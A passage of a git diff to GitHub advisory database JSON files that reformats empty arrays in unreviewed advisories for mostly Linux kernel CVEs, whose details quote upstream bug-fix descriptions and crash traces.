a/advisories/unreviewed/2024/05/GHSA-mv9f-845w-2cgm/GHSA-mv9f-845w-2cgm.json +++ b/advisories/unreviewed/2024/05/GHSA-mv9f-845w-2cgm/GHSA-mv9f-845w-2cgm.json @@ -7,12 +7,8 @@ "CVE-2021-47234" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nphy: phy-mtk-tphy: Fix some resource leaks in mtk_phy_init()\n\nUse clk_disable_unprepare() in the error path of mtk_phy_init() to fix\nsome resource leaks.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-mvc4-fr9f-g4j8/GHSA-mvc4-fr9f-g4j8.json b/advisories/unreviewed/2024/05/GHSA-mvc4-fr9f-g4j8/GHSA-mvc4-fr9f-g4j8.json index c7acce84eff..1abe3cf82e8 100644 --- a/advisories/unreviewed/2024/05/GHSA-mvc4-fr9f-g4j8/GHSA-mvc4-fr9f-g4j8.json +++ b/advisories/unreviewed/2024/05/GHSA-mvc4-fr9f-g4j8/GHSA-mvc4-fr9f-g4j8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-p2qw-28x5-q4gw/GHSA-p2qw-28x5-q4gw.json b/advisories/unreviewed/2024/05/GHSA-p2qw-28x5-q4gw/GHSA-p2qw-28x5-q4gw.json index f490e958cbc..cd4608cced4 100644 --- a/advisories/unreviewed/2024/05/GHSA-p2qw-28x5-q4gw/GHSA-p2qw-28x5-q4gw.json +++ b/advisories/unreviewed/2024/05/GHSA-p2qw-28x5-q4gw/GHSA-p2qw-28x5-q4gw.json @@ -7,12 +7,8 @@ "CVE-2021-47394" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: unlink table before deleting it\n\nsyzbot reports following UAF:\nBUG: KASAN: use-after-free in memcmp+0x18f/0x1c0 lib/string.c:955\n nla_strcmp+0xf2/0x130 lib/nlattr.c:836\n nft_table_lookup.part.0+0x1a2/0x460 net/netfilter/nf_tables_api.c:570\n nft_table_lookup net/netfilter/nf_tables_api.c:4064 [inline]\n nf_tables_getset+0x1b3/0x860 net/netfilter/nf_tables_api.c:4064\n nfnetlink_rcv_msg+0x659/0x13f0 net/netfilter/nfnetlink.c:285\n netlink_rcv_skb+0x153/0x420 net/netlink/af_netlink.c:2504\n\nProblem is that all get operations are lockless, so the commit_mutex\nheld by nft_rcv_nl_event() isn't enough to stop a parallel GET request\nfrom doing read-accesses to the table object even after synchronize_rcu().\n\nTo avoid this, unlink the table first and store the table objects in\non-stack scratch space.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-p52g-5qgx-4crw/GHSA-p52g-5qgx-4crw.json b/advisories/unreviewed/2024/05/GHSA-p52g-5qgx-4crw/GHSA-p52g-5qgx-4crw.json index 4a583baa016..19d1762672d 100644 --- a/advisories/unreviewed/2024/05/GHSA-p52g-5qgx-4crw/GHSA-p52g-5qgx-4crw.json +++ b/advisories/unreviewed/2024/05/GHSA-p52g-5qgx-4crw/GHSA-p52g-5qgx-4crw.json @@ -7,12 +7,8 @@ "CVE-2021-47256" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/memory-failure: make sure wait for page writeback in memory_failure\n\nOur syzkaller trigger the \"BUG_ON(!list_empty(&inode->i_wb_list))\" in\nclear_inode:\n\n kernel BUG at fs/inode.c:519!\n Internal error: Oops - BUG: 0 [#1] SMP\n Modules linked in:\n Process syz-executor.0 (pid: 249, stack limit = 0x00000000a12409d7)\n CPU: 1 PID: 249 Comm: syz-executor.0 Not tainted 4.19.95\n Hardware name: linux,dummy-virt (DT)\n pstate: 80000005 (Nzcv daif -PAN -UAO)\n pc : clear_inode+0x280/0x2a8\n lr : clear_inode+0x280/0x2a8\n Call trace:\n clear_inode+0x280/0x2a8\n ext4_clear_inode+0x38/0xe8\n ext4_free_inode+0x130/0xc68\n ext4_evict_inode+0xb20/0xcb8\n evict+0x1a8/0x3c0\n iput+0x344/0x460\n do_unlinkat+0x260/0x410\n __arm64_sys_unlinkat+0x6c/0xc0\n el0_svc_common+0xdc/0x3b0\n el0_svc_handler+0xf8/0x160\n el0_svc+0x10/0x218\n Kernel panic - not syncing: Fatal exception\n\nA crash dump of this problem show that someone called __munlock_pagevec\nto clear page LRU without lock_page: do_mmap -> mmap_region -> do_munmap\n-> munlock_vma_pages_range -> __munlock_pagevec.\n\nAs a result memory_failure will call identify_page_state without\nwait_on_page_writeback. And after truncate_error_page clear the mapping\nof this page. end_page_writeback won't call sb_clear_inode_writeback to\nclear inode->i_wb_list. That will trigger BUG_ON in clear_inode!\n\nFix it by checking PageWriteback too to help determine should we skip\nwait_on_page_writeback.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-p793-3f2h-38xw/GHSA-p793-3f2h-38xw.json b/advisories/unreviewed/2024/05/GHSA-p793-3f2h-38xw/GHSA-p793-3f2h-38xw.json index 3dcf9a3e277..885579a1c28 100644 --- a/advisories/unreviewed/2024/05/GHSA-p793-3f2h-38xw/GHSA-p793-3f2h-38xw.json +++ b/advisories/unreviewed/2024/05/GHSA-p793-3f2h-38xw/GHSA-p793-3f2h-38xw.json @@ -7,12 +7,8 @@ "CVE-2021-47376" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Add oversize check before call kvcalloc()\n\nCommit 7661809d493b (\"mm: don't allow oversized kvmalloc() calls\") add the\noversize check. When the allocation is larger than what kmalloc() supports,\nthe following warning triggered:\n\nWARNING: CPU: 0 PID: 8408 at mm/util.c:597 kvmalloc_node+0x108/0x110 mm/util.c:597\nModules linked in:\nCPU: 0 PID: 8408 Comm: syz-executor221 Not tainted 5.14.0-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011\nRIP: 0010:kvmalloc_node+0x108/0x110 mm/util.c:597\nCall Trace:\n kvmalloc include/linux/mm.h:806 [inline]\n kvmalloc_array include/linux/mm.h:824 [inline]\n kvcalloc include/linux/mm.h:829 [inline]\n check_btf_line kernel/bpf/verifier.c:9925 [inline]\n check_btf_info kernel/bpf/verifier.c:10049 [inline]\n bpf_check+0xd634/0x150d0 kernel/bpf/verifier.c:13759\n bpf_prog_load kernel/bpf/syscall.c:2301 [inline]\n __sys_bpf+0x11181/0x126e0 kernel/bpf/syscall.c:4587\n __do_sys_bpf kernel/bpf/syscall.c:4691 [inline]\n __se_sys_bpf kernel/bpf/syscall.c:4689 [inline]\n __x64_sys_bpf+0x78/0x90 kernel/bpf/syscall.c:4689\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x44/0xae", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-pcr5-v468-562j/GHSA-pcr5-v468-562j.json b/advisories/unreviewed/2024/05/GHSA-pcr5-v468-562j/GHSA-pcr5-v468-562j.json index 1fd73532153..b296ff2d659 100644 --- a/advisories/unreviewed/2024/05/GHSA-pcr5-v468-562j/GHSA-pcr5-v468-562j.json +++ b/advisories/unreviewed/2024/05/GHSA-pcr5-v468-562j/GHSA-pcr5-v468-562j.json @@ -7,12 +7,8 @@ "CVE-2021-47235" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ethernet: fix potential use-after-free in ec_bhf_remove\n\nstatic void ec_bhf_remove(struct pci_dev *dev)\n{\n...\n\tstruct ec_bhf_priv *priv = netdev_priv(net_dev);\n\n\tunregister_netdev(net_dev);\n\tfree_netdev(net_dev);\n\n\tpci_iounmap(dev, priv->dma_io);\n\tpci_iounmap(dev, priv->io);\n...\n}\n\npriv is netdev private data, but it is used\nafter free_netdev(). It can cause use-after-free when accessing priv\npointer. So, fix it by moving free_netdev() after pci_iounmap()\ncalls.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-pmmh-7pm7-hc62/GHSA-pmmh-7pm7-hc62.json b/advisories/unreviewed/2024/05/GHSA-pmmh-7pm7-hc62/GHSA-pmmh-7pm7-hc62.json index 6f1509ccce6..55f95525ca5 100644 --- a/advisories/unreviewed/2024/05/GHSA-pmmh-7pm7-hc62/GHSA-pmmh-7pm7-hc62.json +++ b/advisories/unreviewed/2024/05/GHSA-pmmh-7pm7-hc62/GHSA-pmmh-7pm7-hc62.json @@ -7,12 +7,8 @@ "CVE-2021-47233" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nregulator: rt4801: Fix NULL pointer dereference if priv->enable_gpios is NULL\n\ndevm_gpiod_get_array_optional may return NULL if no GPIO was assigned.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-prq2-qj2r-jcgv/GHSA-prq2-qj2r-jcgv.json b/advisories/unreviewed/2024/05/GHSA-prq2-qj2r-jcgv/GHSA-prq2-qj2r-jcgv.json index a620ab737b0..422b0efb1d3 100644 --- a/advisories/unreviewed/2024/05/GHSA-prq2-qj2r-jcgv/GHSA-prq2-qj2r-jcgv.json +++ b/advisories/unreviewed/2024/05/GHSA-prq2-qj2r-jcgv/GHSA-prq2-qj2r-jcgv.json @@ -7,12 +7,8 @@ "CVE-2021-47249" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rds: fix memory leak in rds_recvmsg\n\nSyzbot reported memory leak in rds. The problem\nwas in unputted refcount in case of error.\n\nint rds_recvmsg(struct socket *sock, struct msghdr *msg, size_t size,\n\t\tint msg_flags)\n{\n...\n\n\tif (!rds_next_incoming(rs, &inc)) {\n\t\t...\n\t}\n\nAfter this \"if\" inc refcount incremented and\n\n\tif (rds_cmsg_recv(inc, msg, rs)) {\n\t\tret = -EFAULT;\n\t\tgoto out;\n\t}\n...\nout:\n\treturn ret;\n}\n\nin case of rds_cmsg_recv() fail the refcount won't be\ndecremented. And it's easy to see from ftrace log, that\nrds_inc_addref() don't have rds_inc_put() pair in\nrds_recvmsg() after rds_cmsg_recv()\n\n 1) | rds_recvmsg() {\n 1) 3.721 us | rds_inc_addref();\n 1) 3.853 us | rds_message_inc_copy_to_user();\n 1) + 10.395 us | rds_cmsg_recv();\n 1) + 34.260 us | }", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-pxqq-3ph7-mw6w/GHSA-pxqq-3ph7-mw6w.json b/advisories/unreviewed/2024/05/GHSA-pxqq-3ph7-mw6w/GHSA-pxqq-3ph7-mw6w.json index 5f23bb62627..c67b33f3d0c 100644 --- a/advisories/unreviewed/2024/05/GHSA-pxqq-3ph7-mw6w/GHSA-pxqq-3ph7-mw6w.json +++ b/advisories/unreviewed/2024/05/GHSA-pxqq-3ph7-mw6w/GHSA-pxqq-3ph7-mw6w.json @@ -7,12 +7,8 @@ "CVE-2021-47421" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: handle the case of pci_channel_io_frozen only in amdgpu_pci_resume\n\nIn current code, when a PCI error state pci_channel_io_normal is detectd,\nit will report PCI_ERS_RESULT_CAN_RECOVER status to PCI driver, and PCI\ndriver will continue the execution of PCI resume callback report_resume by\npci_walk_bridge, and the callback will go into amdgpu_pci_resume\nfinally, where write lock is releasd unconditionally without acquiring\nsuch lock first. In this case, a deadlock will happen when other threads\nstart to acquire the read lock.\n\nTo fix this, add a member in amdgpu_device strucutre to cache\npci_channel_state, and only continue the execution in amdgpu_pci_resume\nwhen it's pci_channel_io_frozen.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-q262-3hfr-f5q4/GHSA-q262-3hfr-f5q4.json b/advisories/unreviewed/2024/05/GHSA-q262-3hfr-f5q4/GHSA-q262-3hfr-f5q4.json index 3a1e9ab7aeb..4e161cb33cd 100644 --- a/advisories/unreviewed/2024/05/GHSA-q262-3hfr-f5q4/GHSA-q262-3hfr-f5q4.json +++ b/advisories/unreviewed/2024/05/GHSA-q262-3hfr-f5q4/GHSA-q262-3hfr-f5q4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-qj68-9gpw-8pq2/GHSA-qj68-9gpw-8pq2.json b/advisories/unreviewed/2024/05/GHSA-qj68-9gpw-8pq2/GHSA-qj68-9gpw-8pq2.json index 0ddb62ea9f8..27d9755cb62 100644 --- a/advisories/unreviewed/2024/05/GHSA-qj68-9gpw-8pq2/GHSA-qj68-9gpw-8pq2.json +++ b/advisories/unreviewed/2024/05/GHSA-qj68-9gpw-8pq2/GHSA-qj68-9gpw-8pq2.json @@ -7,12 +7,8 @@ "CVE-2021-47275" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbcache: avoid oversized read request in cache missing code path\n\nIn the cache missing code path of cached device, if a proper location\nfrom the internal B+ tree is matched for a cache miss range, function\ncached_dev_cache_miss() will be called in cache_lookup_fn() in the\nfollowing code block,\n[code block 1]\n 526 unsigned int sectors = KEY_INODE(k) == s->iop.inode\n 527 ? min_t(uint64_t, INT_MAX,\n 528 KEY_START(k) - bio->bi_iter.bi_sector)\n 529 : INT_MAX;\n 530 int ret = s->d->cache_miss(b, s, bio, sectors);\n\nHere s->d->cache_miss() is the call backfunction pointer initialized as\ncached_dev_cache_miss(), the last parameter 'sectors' is an important\nhint to calculate the size of read request to backing device of the\nmissing cache data.\n\nCurrent calculation in above code block may generate oversized value of\n'sectors', which consequently may trigger 2 different potential kernel\npanics by BUG() or BUG_ON() as listed below,\n\n1) BUG_ON() inside bch_btree_insert_key(),\n[code block 2]\n 886 BUG_ON(b->ops->is_extents && !KEY_SIZE(k));\n2) BUG() inside biovec_slab(),\n[code block 3]\n 51 default:\n 52 BUG();\n 53 return NULL;\n\nAll the above panics are original from cached_dev_cache_miss() by the\noversized parameter 'sectors'.\n\nInside cached_dev_cache_miss(), parameter 'sectors' is used to calculate\nthe size of data read from backing device for the cache missing. This\nsize is stored in s->insert_bio_sectors by the following lines of code,\n[code block 4]\n 909 s->insert_bio_sectors = min(sectors, bio_sectors(bio) + reada);\n\nThen the actual key inserting to the internal B+ tree is generated and\nstored in s->iop.replace_key by the following lines of code,\n[code block 5]\n 911 s->iop.replace_key = KEY(s->iop.inode,\n 912 bio->bi_iter.bi_sector + s->insert_bio_sectors,\n 913 s->insert_bio_sectors);\nThe oversized parameter 'sectors' may trigger panic 1) by BUG_ON() from\nthe above code block.\n\nAnd the bio sending to backing device for the missing data is allocated\nwith hint from s->insert_bio_sectors by the following lines of code,\n[code block 6]\n 926 cache_bio = bio_alloc_bioset(GFP_NOWAIT,\n 927 DIV_ROUND_UP(s->insert_bio_sectors, PAGE_SECTORS),\n 928 &dc->disk.bio_split);\nThe oversized parameter 'sectors' may trigger panic 2) by BUG() from the\nagove code block.\n\nNow let me explain how the panics happen with the oversized 'sectors'.\nIn code block 5, replace_key is generated by macro KEY(). From the\ndefinition of macro KEY(),\n[code block 7]\n 71 #define KEY(inode, offset, size) \\\n 72 ((struct bkey) { \\\n 73 .high = (1ULL << 63) | ((__u64) (size) << 20) | (inode), \\\n 74 .low = (offset) \\\n 75 })\n\nHere 'size' is 16bits width embedded in 64bits member 'high' of struct\nbkey. But in code block 1, if \"KEY_START(k) - bio->bi_iter.bi_sector\" is\nvery probably to be larger than (1<<16) - 1, which makes the bkey size\ncalculation in code block 5 is overflowed. In one bug report the value\nof parameter 'sectors' is 131072 (= 1 << 17), the overflowed 'sectors'\nresults the overflowed s->insert_bio_sectors in code block 4, then makes\nsize field of s->iop.replace_key to be 0 in code block 5. Then the 0-\nsized s->iop.replace_key is inserted into the internal B+ tree as cache\nmissing check key (a special key to detect and avoid a racing between\nnormal write request and cache missing read request) as,\n[code block 8]\n 915 ret = bch_btree_insert_check_key(b, &s->op, &s->iop.replace_key);\n\nThen the 0-sized s->iop.replace_key as 3rd parameter triggers the bkey\nsize check BUG_ON() in code block 2, and causes the kernel panic 1).\n\nAnother ke\n---truncated---", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-qpf6-m6mq-hcmq/GHSA-qpf6-m6mq-hcmq.json b/advisories/unreviewed/2024/05/GHSA-qpf6-m6mq-hcmq/GHSA-qpf6-m6mq-hcmq.json index d29101dd1ac..4d1be0d48c5 100644 --- a/advisories/unreviewed/2024/05/GHSA-qpf6-m6mq-hcmq/GHSA-qpf6-m6mq-hcmq.json +++ b/advisories/unreviewed/2024/05/GHSA-qpf6-m6mq-hcmq/GHSA-qpf6-m6mq-hcmq.json @@ -7,12 +7,8 @@ "CVE-2021-47380" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: amd_sfh: Fix potential NULL pointer dereference\n\ndevm_add_action_or_reset() can suddenly invoke amd_mp2_pci_remove() at\nregistration that will cause NULL pointer dereference since\ncorresponding data is not initialized yet. The patch moves\ninitialization of data before devm_add_action_or_reset().\n\nFound by Linux Driver Verification project (linuxtesting.org).\n\n[jkosina@suse.cz: rebase]", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-qqw5-j897-27cf/GHSA-qqw5-j897-27cf.json b/advisories/unreviewed/2024/05/GHSA-qqw5-j897-27cf/GHSA-qqw5-j897-27cf.json index 7ae0d40a99f..2039b4be5cb 100644 --- a/advisories/unreviewed/2024/05/GHSA-qqw5-j897-27cf/GHSA-qqw5-j897-27cf.json +++ b/advisories/unreviewed/2024/05/GHSA-qqw5-j897-27cf/GHSA-qqw5-j897-27cf.json @@ -7,12 +7,8 @@ "CVE-2021-47293" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: act_skbmod: Skip non-Ethernet packets\n\nCurrently tcf_skbmod_act() assumes that packets use Ethernet as their L2\nprotocol, which is not always the case. As an example, for CAN devices:\n\n\t$ ip link add dev vcan0 type vcan\n\t$ ip link set up vcan0\n\t$ tc qdisc add dev vcan0 root handle 1: htb\n\t$ tc filter add dev vcan0 parent 1: protocol ip prio 10 \\\n\t\tmatchall action skbmod swap mac\n\nDoing the above silently corrupts all the packets. Do not perform skbmod\nactions for non-Ethernet packets.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-qxcq-r5q3-4wq6/GHSA-qxcq-r5q3-4wq6.json b/advisories/unreviewed/2024/05/GHSA-qxcq-r5q3-4wq6/GHSA-qxcq-r5q3-4wq6.json index d1cbf89c020..20b4e17aaab 100644 --- a/advisories/unreviewed/2024/05/GHSA-qxcq-r5q3-4wq6/GHSA-qxcq-r5q3-4wq6.json +++ b/advisories/unreviewed/2024/05/GHSA-qxcq-r5q3-4wq6/GHSA-qxcq-r5q3-4wq6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-qxvg-qh99-hg66/GHSA-qxvg-qh99-hg66.json b/advisories/unreviewed/2024/05/GHSA-qxvg-qh99-hg66/GHSA-qxvg-qh99-hg66.json index b4664624732..4aa37d3da17 100644 --- a/advisories/unreviewed/2024/05/GHSA-qxvg-qh99-hg66/GHSA-qxvg-qh99-hg66.json +++ b/advisories/unreviewed/2024/05/GHSA-qxvg-qh99-hg66/GHSA-qxvg-qh99-hg66.json @@ -7,12 +7,8 @@ "CVE-2021-47264" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: core: Fix Null-point-dereference in fmt_single_name()\n\nCheck the return value of devm_kstrdup() in case of\nNull-point-dereference.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-rcjv-j3v6-r6cv/GHSA-rcjv-j3v6-r6cv.json b/advisories/unreviewed/2024/05/GHSA-rcjv-j3v6-r6cv/GHSA-rcjv-j3v6-r6cv.json index e1c149ddb58..0b2217fb423 100644 --- a/advisories/unreviewed/2024/05/GHSA-rcjv-j3v6-r6cv/GHSA-rcjv-j3v6-r6cv.json +++ b/advisories/unreviewed/2024/05/GHSA-rcjv-j3v6-r6cv/GHSA-rcjv-j3v6-r6cv.json @@ -7,12 +7,8 @@ "CVE-2021-47280" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: Fix use-after-free read in drm_getunique()\n\nThere is a time-of-check-to-time-of-use error in drm_getunique() due\nto retrieving file_priv->master prior to locking the device's master\nmutex.\n\nAn example can be seen in the crash report of the use-after-free error\nfound by Syzbot:\nhttps://syzkaller.appspot.com/bug?id=148d2f1dfac64af52ffd27b661981a540724f803\n\nIn the report, the master pointer was used after being freed. This is\nbecause another process had acquired the device's master mutex in\ndrm_setmaster_ioctl(), then overwrote fpriv->master in\ndrm_new_set_master(). The old value of fpriv->master was subsequently\nfreed before the mutex was unlocked.\n\nTo fix this, we lock the device's master mutex before retrieving the\npointer from from fpriv->master. This patch passes the Syzbot\nreproducer test.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-rr3f-v8j5-mmr6/GHSA-rr3f-v8j5-mmr6.json b/advisories/unreviewed/2024/05/GHSA-rr3f-v8j5-mmr6/GHSA-rr3f-v8j5-mmr6.json index 6452d389ccb..deb4f263095 100644 --- a/advisories/unreviewed/2024/05/GHSA-rr3f-v8j5-mmr6/GHSA-rr3f-v8j5-mmr6.json +++ b/advisories/unreviewed/2024/05/GHSA-rr3f-v8j5-mmr6/GHSA-rr3f-v8j5-mmr6.json @@ -7,12 +7,8 @@ "CVE-2021-47248" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nudp: fix race between close() and udp_abort()\n\nKaustubh reported and diagnosed a panic in udp_lib_lookup().\nThe root cause is udp_abort() racing with close(). Both\nracing functions acquire the socket lock, but udp{v6}_destroy_sock()\nrelease it before performing destructive actions.\n\nWe can't easily extend the socket lock scope to avoid the race,\ninstead use the SOCK_DEAD flag to prevent udp_abort from doing\nany action when the critical race happens.\n\nDiagnosed-and-tested-by: Kaustubh Pandey ", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-rrv6-pjjr-4r3x/GHSA-rrv6-pjjr-4r3x.json b/advisories/unreviewed/2024/05/GHSA-rrv6-pjjr-4r3x/GHSA-rrv6-pjjr-4r3x.json index c0de73e8c54..f367f4d7325 100644 --- a/advisories/unreviewed/2024/05/GHSA-rrv6-pjjr-4r3x/GHSA-rrv6-pjjr-4r3x.json +++ b/advisories/unreviewed/2024/05/GHSA-rrv6-pjjr-4r3x/GHSA-rrv6-pjjr-4r3x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-rwqc-8qvc-52fh/GHSA-rwqc-8qvc-52fh.json b/advisories/unreviewed/2024/05/GHSA-rwqc-8qvc-52fh/GHSA-rwqc-8qvc-52fh.json index 8cc76ce912e..eccd43baa3c 100644 --- a/advisories/unreviewed/2024/05/GHSA-rwqc-8qvc-52fh/GHSA-rwqc-8qvc-52fh.json +++ b/advisories/unreviewed/2024/05/GHSA-rwqc-8qvc-52fh/GHSA-rwqc-8qvc-52fh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-vqc4-qhx7-82xg/GHSA-vqc4-qhx7-82xg.json b/advisories/unreviewed/2024/05/GHSA-vqc4-qhx7-82xg/GHSA-vqc4-qhx7-82xg.json index b7740fd847e..7513c23fddb 100644 --- a/advisories/unreviewed/2024/05/GHSA-vqc4-qhx7-82xg/GHSA-vqc4-qhx7-82xg.json +++ b/advisories/unreviewed/2024/05/GHSA-vqc4-qhx7-82xg/GHSA-vqc4-qhx7-82xg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-w5h4-c4xx-3r8p/GHSA-w5h4-c4xx-3r8p.json b/advisories/unreviewed/2024/05/GHSA-w5h4-c4xx-3r8p/GHSA-w5h4-c4xx-3r8p.json index 0ab64f55f8b..9576399b612 100644 --- a/advisories/unreviewed/2024/05/GHSA-w5h4-c4xx-3r8p/GHSA-w5h4-c4xx-3r8p.json +++ b/advisories/unreviewed/2024/05/GHSA-w5h4-c4xx-3r8p/GHSA-w5h4-c4xx-3r8p.json @@ -7,12 +7,8 @@ "CVE-2021-47300" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix tail_call_reachable rejection for interpreter when jit failed\n\nDuring testing of f263a81451c1 (\"bpf: Track subprog poke descriptors correctly\nand fix use-after-free\") under various failure conditions, for example, when\njit_subprogs() fails and tries to clean up the program to be run under the\ninterpreter, we ran into the following freeze:\n\n [...]\n #127/8 tailcall_bpf2bpf_3:FAIL\n [...]\n [ 92.041251] BUG: KASAN: slab-out-of-bounds in ___bpf_prog_run+0x1b9d/0x2e20\n [ 92.042408] Read of size 8 at addr ffff88800da67f68 by task test_progs/682\n [ 92.043707]\n [ 92.044030] CPU: 1 PID: 682 Comm: test_progs Tainted: G O 5.13.0-53301-ge6c08cb33a30-dirty #87\n [ 92.045542] Hardware name: QEMU Standard PC 